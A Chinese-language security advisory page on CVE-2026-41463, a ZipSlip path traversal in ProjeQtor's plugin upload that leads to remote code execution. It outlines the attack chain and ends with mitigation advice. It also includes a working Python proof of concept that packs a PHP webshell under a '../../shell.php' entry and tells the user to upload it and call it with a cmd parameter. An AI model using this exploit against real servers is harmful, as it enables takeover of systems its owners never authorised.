CVE-2026-41463 CVSS 8.8 高危

CVE-2026-41463 ProjeQtor ZipSlip路径遍历致RCE漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41463

漏洞类型

路径遍历, 远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ProjeQtor

漏洞概述

ProjeQtor项目管理软件7.0至12.4.3版本中存在严重的ZipSlip路径遍历漏洞。由于在插件上传功能中对ZIP文件解压缺乏安全校验，拥有上传权限的攻击者可上传恶意压缩包，将文件写入预期目录之外，导致服务器被写入Webshell并执行任意代码。

技术细节

该漏洞的核心在于ProjeQtor的插件上传模块在处理ZIP归档时，未正确验证归档内文件的路径信息。攻击者可以利用“../”序列（ZipSlip技术）将压缩包内的文件路径指向解压目标目录之外的任意位置。攻击者首先需注册一个拥有插件上传权限的账户，随后构造一个包含PHP后门文件且文件名被恶意拼接（如`../../www/uploads/shell.php`）的ZIP文件。一旦上传并触发解压，该PHP文件便会被释放到Web目录下。攻击者通过发送HTTP请求访问该文件，即可在服务器端执行任意系统指令，获取服务器完全控制权。

攻击链分析

STEP 1

获取权限

攻击者注册或利用现有账户，获取ProjeQtor中具备插件上传权限的认证身份。

STEP 2

构造恶意文件

攻击者创建一个包含PHP Webshell的ZIP文件，并将文件名修改为包含“../”的路径遍历序列（如../../shell.php）。

STEP 3

上传文件

攻击者通过ProjeQtor的插件上传功能界面，上传构造好的恶意ZIP压缩包。

STEP 4

触发解压

服务器端自动解压ZIP文件，由于未校验路径，Webshell被写入Web根目录下的指定位置。

STEP 5

执行代码

攻击者通过浏览器访问已上传的Webshell文件，发送指令在服务器上执行任意系统命令，获取控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept (PoC) for CVE-2026-41463
# This script generates a malicious ZIP file designed to exploit the ZipSlip vulnerability.

import zipfile
import os

# The malicious PHP code to be executed
webshell_content = '<?php system($_GET["cmd"]); ?>'

# The path traversal sequence to write to the web root
# Adjust the path based on the target structure (e.g., ../../www/)
malicious_filename = '../../shell.php'

# Create the malicious ZIP file
zip_filename = 'exploit.zip'

with zipfile.ZipFile(zip_filename, 'w') as zf:
    # Write the file with the traversal sequence
    zf.writestr(malicious_filename, webshell_content)

print(f'[+] Malicious ZIP file created: {zip_filename}')
print(f'[+] Upload this file via the Plugin Upload functionality in ProjeQtor.')
print(f'[+] Access the shell at: /shell.php?cmd=whoami')

影响范围

ProjeQtor 7.0 - 12.4.3

防御指南

临时缓解措施

建议立即升级官方发布的修复版本。在无法立即升级的情况下，应严格限制插件上传权限的账户数量，并部署Web应用防火墙（WAF）规则，检测并拦截包含路径遍历特征（如../）的文件上传请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表